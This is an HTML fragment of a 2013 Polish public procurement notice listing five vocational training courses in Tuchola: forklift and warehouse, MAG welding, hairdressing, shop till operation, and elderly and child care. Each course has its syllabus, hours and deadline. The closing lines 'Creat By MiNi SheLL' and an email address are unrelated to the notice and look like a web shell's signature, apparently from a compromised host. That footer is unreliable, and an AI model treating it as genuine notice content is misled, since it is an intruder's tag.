<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs pn. Magazynier - operator wózków jezdniowych wraz z bezpieczną wymianą butli.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - kurs przewidziany jest dla 6 osób (+/- 1)
Celem kursu jest przygotowanie uczestników projektu do wykonywania zawodu magazyniera, a także nabycie uprawnień kierowcy wózka jezdniowego oraz do bezpiecznej wymiany butli gazowej.
Kurs składa się z dwóch zakresów tematycznych:
1. Magazynier - zakres przygotowania do wykonywania zawodu magazyniera obejmuje: 
gospodarkę magazynową,
zapoznanie z dokumentacją organizacji magazynu, oraz znakowaniem magazynu,
zasady prowadzenia inwentaryzacji,
sporządzanie zamówień na towary,
sprawdzanie dostaw pod względem ilościowym i jakościowym,
rozmieszczanie towarów w magazynie,
przepisy bhp w jednostce handlowej,
obsługa komputera i programów do prowadzenia gospodarski magazynowej,
przyjmowanie i magazynowanie towarów,
wystawianie dokumentów: przychód wewnętrzny PW, wydanie zewnętrzne WZ i rozchód wewnętrzny RW,
wystawianie dokumentów typu MM,
kultura zawodu,
odpowiedzialność materialna.

Zajęcia muszą odbywać się w specjalnie do tego celu przygotowanej pracowni, wyposażonej w odpowiednią liczbę stanowisk, przy zasadzie: co najmniej jedno stanowisko na 2 uczestników kursu. Czas trwania kursu musi zakładać 60 godzin szkoleniowych dla każdej z osób (45 min. = 1 godzina szkoleniowa), w tym 45 godzin zajęć teoretycznych oraz 15 godzin zajęć praktycznych.

2. Kierowca wózka jezdniowego z uprawnieniami do bezpiecznej wymiany butli gazowej - zakres nabycia uprawnień do wykonywania zawodu obejmuje:
zagadnienia z aktualnej ustawy o dozorze technicznym,
typy wózków jezdniowych widłowych i specjalistycznych) i ich budowa,
czynności operatora przy obsłudze wózków - przed rozpoczęciem i po pracy z wózkami, 
czynności operatora podczas pracy z wózkami,
praktyczna nauka jazdy i manewrowania osprzętem wózków,
informacje z zakresu ładunkoznawstwa,
wiadomości z zakresu BHP,
omówienie zagadnienia wymiany butli gazowych w wózkach zasilanych paliwem typu gazowego,
praktyczna nauka wymiany butli gazowej.

Czas trwania kursu musi zakładać 60 godzin szkoleniowych, w tym 45 godzin zajęć teoretycznych oraz 20 godzin praktycznych.
Do czasu szkolenia Wykonawca zobowiązany jest doliczyć czas na egzamin końcowy. Szkolenie teoretyczne i praktyczne na operatora wózków jezdniowych, napędzanych silnikami z wymianą butli gazowych propan-butan musi być zgodne z wytycznymi programu Ośrodka Doskonalenia Kadr Ministerstwa Gospodarki w Mysłowicach.
Wykonawca dopełni wszelkich formalności, związanych ze zgłoszeniem uczestników do egzaminu państwowego i jego przeprowadzeniem, a także formalności związanych z uzyskaniem przez uczestników badań psychotechnicznych oraz innych zaświadczeń, niezbędnych do wykonywania zawodu operatora wózka jezdniowego z uprawnieniami do wymiany butli gazowej - koszty z tym związane należy ująć w cenie kursu.
Zakończenie kursu następuje po otrzymaniu przez uczestnika zaświadczenia o ukończeniu kursu Magazynier - operator wózków jezdniowych z bezpieczną wymianą butli gazowych oraz po otrzymaniu uprawnień kierowcy wózków jezdniowych. 
POZOSTAŁE WYMAGANIA ZOSTAŁY OPISANE W ROZDZIALE II SIWZ.
miejsce realizacji: zajęcia teoretyczne - teren miasta Tuchola, zajęcia praktyczne - teren miasta i gminy Tuchola lub powiatów ościennych, tj. chojnickiego, świeckiego, sępoleńskiego, człuchowskiego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs spawacza metodą MAG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - liczba uczestników - 9 osób (+/- 1),
Celem kursu jest przygotowanie uczestników projektu do wykonywania zawodu spawacza metodą MAG. 
Zakres kursu obejmuje zagadnienia, dzięki którym uczestnik  uzyskuje uprawnienia do wykonywania spoin pachwinowych blach i rur ze stali ferrytycznych metodą MAG, zgodnie z obowiązującymi przepisami i aktualnymi normami dotyczącymi przeprowadzania egzaminów kwalifikacyjnych spawaczy.

Program kursu obejmuje:
podstawowe zasady BHP,
bezpieczna praca na hali produkcyjnej,
zastosowanie elektryczności do spawania łukowego,
urządzenia spawalnicze i materiały dodatkowe do spawania,
oznaczenie i wymiarowanie spoin,
metody przygotowania złączy do spawania,
kwalifikowanie spawaczy,
budowa i użytkowanie urządzeń do spawania MAG, 
charakterystyka spawania MAG oraz typowe parametry.

Kurs spawania blach i rur spoinami pachwinowymi metodą MAG obejmuje 30 godzin zajęć teoretycznych oraz 120 godzin zajeć praktycznych. 
Zakończenie kursu związane jest z otrzymaniem  zaświadczenia/certyfikatu oraz Książeczki Spawacza według normy EN 287-1 (wystawionej przez Instytut Spawalnictwa w Gliwicach).
Wykonawca zobowiązany jest do zapewnienia niezbędnych badań lekarskich, wydanych przez lekarza medycyny pracy, stwierdzających przydatność do pracy w zawodzie spawacza oraz zapewnienia odpowiedniej odzieży ochronnej podczas kursu.
W przypadku, kiedy zajęcia praktyczne będą odbywać się poza terenem miasta Tuchola, organizacja dowozu oraz koszty z tym związane są po stronie Wykonawcy.
POZOSTAŁE WYMAGANIA ZOSTAŁY OPISANE W ROZDZIALE II SIWZ.
- miejsce realizacji: zajęcia teoretyczne - teren miasta Tuchola, zajęcia praktyczne - teren miasta i gminy Tuchola lub powiatów ościennych tj. chojnickiego, świeckiego, sępoleńskiego i człuchowskiego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs fryzjerski z elementami wizażu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - liczba uczestników - 6 osób (+/- 1)
Celem kursu jest zdobycie teoretycznych podstaw oraz praktycznych umiejętności pielęgnacji i stylizacji włosów, organizacji salonu fryzjerskiego, a także umiejętności z zakresu wizażu.
Zakres tematyczny kursu obejmuje takie zagadnienia jak:
specyfika zawodu fryzjera i wizażysty,
higiena w miejscu pracy, dezynfekcja i sterylizacja,
zasady BHP,
organizacja pracy w salonie fryzjerskim,
standardowe wyposażenie salonu fryzjerskiego,
kosmetyka, struktura i właściwości włosa,
diagnoza stanu włosów i skóry głowy oraz nieprawidłowości i uszkodzenia skóry głowy i włosów,
mycie włosów i masaż skóry głowy,
omówienie narzędzi fryzjerskich,
typy i style fryzur oraz dobór fryzury do kształtu twarzy
podstawowe techniki strzyżeń,
pielęgnacja poszczególnych typów skóry, przygotowanie do makijażu,
profesjonalny demakijaż z zastosowaniem podstawowych elementów masażu twarzy,
makijaż dzienny, korekcyjny i kamuflaż oraz wieczorowy,
produkty fryzjerskie i niezbędne do profesjonalnego makijażu: przegląd produktów odnośnie ceny, jakości, zaopatrzenia w detalu i w hurcie,

Kurs obejmuje 70 godzin zajęć teoretycznych oraz 90 godzin zajęć praktycznych. Zakończenie kursu związane jest z otrzymaniem  zaświadczenia/certyfikatu o ukończeniu kursu Fryzjerstwo z elementami wizażu.
Wykonawca zapewnia uczestnikom odpowiednie ubranie, materiały szkoleniowe, akcesoria, kosmetyki i sprzęt niezbędny do realizacji zagadnień.
W przypadku, kiedy zajęcia praktyczne będą odbywać się poza terenem miasta Tuchola, organizacja dowozu oraz koszty z tym związane są po stronie Wykonawcy.
POZOSTAŁE WYMAGANIA ZOSTAŁY OPISANE W ROZDZIALE II SIWZ.
- miejsce realizacji: zajęcia teoretyczne - teren miasta Tuchola, zajęcia praktyczne - teren miasta i gminy Tuchola..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Komputerowa obsługa sklepów i hurtowni z obsługa kasy fiskalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - liczba uczestników - 19 osób (+/- 1), dwie grupy: grupa I - 10 osób, grupa II - 9 osób),
Kurs ma na celu przygotowanie uczestników do wykonywania pracy na stanowisku sprzedawcy z komputerową obsługą sklepów i hurtowni.

Program kursu powinien zawierać następujące zagadnienia
1. Socjologiczne i psychologiczne aspekty pracownika hurtowni i sklepu:
kultura i zasady obsługi klienta,
wiedza o konsumencie,
2. Sprzedaż:
zapoznanie z przepisami BHP i PPOŻ, obowiązującymi w jednostce handlowej,
organizacja pracy sprzedawcy-kasjera,
przepisy prawno-fiskalne oraz zagadnienia prawne związane z instalacją, wykorzystaniem i zgłoszeniem posiadanych urządzeń fiskalnych,
techniki sprzedaży,
czynności kasowo-rachunkowe,
zapoznanie z obsługą przynajmniej dwóch różnych typów kas fiskalnych (najczęściej wykorzystywanych obecnie w handlu) - w tym kasy współpracującej z wagą, czytnikiem i komputerem,
zagadnienia z towaroznawstwa i gospodarki magazynowej,
dokumenty handlowe, magazynowe i inne,
zestawienia i remanent,
fakturowanie,
sporządzanie raportu dobowego fiskalnego i miesięcznego.
3. Zagadnienia z zakresu obsługi komputera:
podstawowe zagadnienia związane z obsługą komputera,
obsługa MS Word - edytor tekstu oraz MS Excel - arkusz kalkulacyjny,
wystawianie dokumentów sprzedaży ręcznie i komputerowo (faktura VAT, paragony zwykłe i fiskalne, rachunki uproszczone, faktury korygujące),
program magazynowy.

Kurs obejmuje 80 godzin zajęc teoretycznych i 40 godzin zajęć praktycznych i prowadzony jest dla 2 grup łącznie, liczących 19 osób (grupa I - 10 osób, grupa II - 9 osób). Kurs powinien odbywać się w specjalnie do tego celu przygotowanej pracowni, wyposażonej w odpowiednią liczbę stanowisk z dostępem do kas fiskalnych i komputera (co najmniej jedno stanowisko na 2 uczestników kursu). Zajęcia praktyczne mogą odbywać się w jednostkach handlowych, jednakże w przypadku, kiedy będą poza terenem miasta Tuchola, organizacja dowozu oraz koszty z tym związane są po stronie Wykonawcy.
POZOSTAŁE WYMAGANIA ZOSTAŁY OPISANE W ROZDZIALE II SIWZ.
- miejsce realizacji: zajęcia teoretyczne - teren miasta Tuchola, zajęcia praktyczne - teren miasta i gminy Tuchola..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> OPIEKUN OSÓB STARSZYCH, NIEPEŁNOSPRAWNYCH I DZIECI
BLOK I: Opiekun osób starszych, niepełnosprawnych i dzieci;
BLOK II Opiekun osób starszych, niepełnosprawnych i dzieci z modułem języka niemieckiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - liczba uczestników: BLOK I - 5 osób, BLOK II - 8 osób (łącznie 13 osób (+/- 1)
Organizowany kurs ma na celu przekazanie wiadomości i umiejętności niezbędnych do wykonywania zawodu opiekuna osób starszych, niepełnosprawnych oraz dzieci. 

Tematyka zajęć powinna obejmować:
1.  Tematyka z zakresu opieki nad osobami starszymi i niepełnosprawnymi:
rola i zadania opiekuna osób starszych i niepełnosprawnych,
psychologia rozwojowa i społeczna,
anatomia z fizjologią,
zaspokajanie podstawowych potrzeb podopiecznego,
wykonywanie pomiarów podstawowych parametrów życiowych,
podstawowe zasady udzielania pierwszej pomocy przedlekarskiej,
pielęgnacja osób starszych, przewlekle chorych i niepełnosprawnych (profilaktyka odleżyn oraz skutków długotrwałego unieruchomienia), 
ochrona przed zakażeniami,
wiadomości o lekach i dietach,
wybrane zagadnienia rehabilitacji osób niepełnosprawnych,
pomoc społeczna i współpraca ze środowiskiem podopiecznego,
etyka zawodowa opiekuna oraz postawa opiekuna wobec uczuć i zachowania pielęgnowanej osoby, postawa opiekuna w obliczu śmierci osoby pielęgnowanej,

Czas trwania kursu musi zakładać 60 godzin szkoleniowych dla każdej z osób (45 min. = 1 godzina szkoleniowa), w tym 15 godzin zajęć teoretycznych oraz 45 godzin zajęć praktycznych. Zajęcia praktyczne - w Domu Pomocy Społecznej lub przy opiekunkach środowiskowych w domu chorego.

2. Tematyka z zakresu opieki nad dziećmi:
psychologia rozwoju dziecka,
opieka,  pielęgnacja noworodka i dziecka,
pierwsza pomoc przedlekarska,
sposoby wspierania prawidłowego rozwoju dziecka,
sposoby zagospodarowania czasu wolnego dziecka,

Czas trwania kursu musi zakładać 60 godzin szkoleniowych dla każdej z osób (45 min. = 1 godzina szkoleniowa), w tym 15 godzin zajęć teoretycznych oraz 45 godzin zajęć praktycznych. Zajęcia praktyczne mogą odbywać się w żłobku, przedszkolu, bądź innej instytucji opieki nad dziećmi.
W przypadku, kiedy zajęcia praktyczne będą odbywać się poza terenem miasta Tuchola, organizacja dowozu oraz koszty z tym związane są po stronie Wykonawcy. Wykonawca zapewnia odzież i obuwie ochronne na czas zajęć praktycznych.

Kurs przewidywany jest dla 13 osób, z czego 8 osób dodatkowo odbędzie szkolenie z zakresu podstaw języka niemieckiego w wymiarze 80 godzin. Uczestnik otrzymuje zaświadczenie/certyfikat ukończenia kursu w języku polskim i niemieckim.
POZOSTAŁE WYMAGANIA ZOSTAŁY OPISANE W ROZDZIALE II SIWZ.
- miejsce realizacji: zajęcia teoretyczne: teren miasta Tuchola, zajęcia praktyczne - teren miasta i gminy Tuchola..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com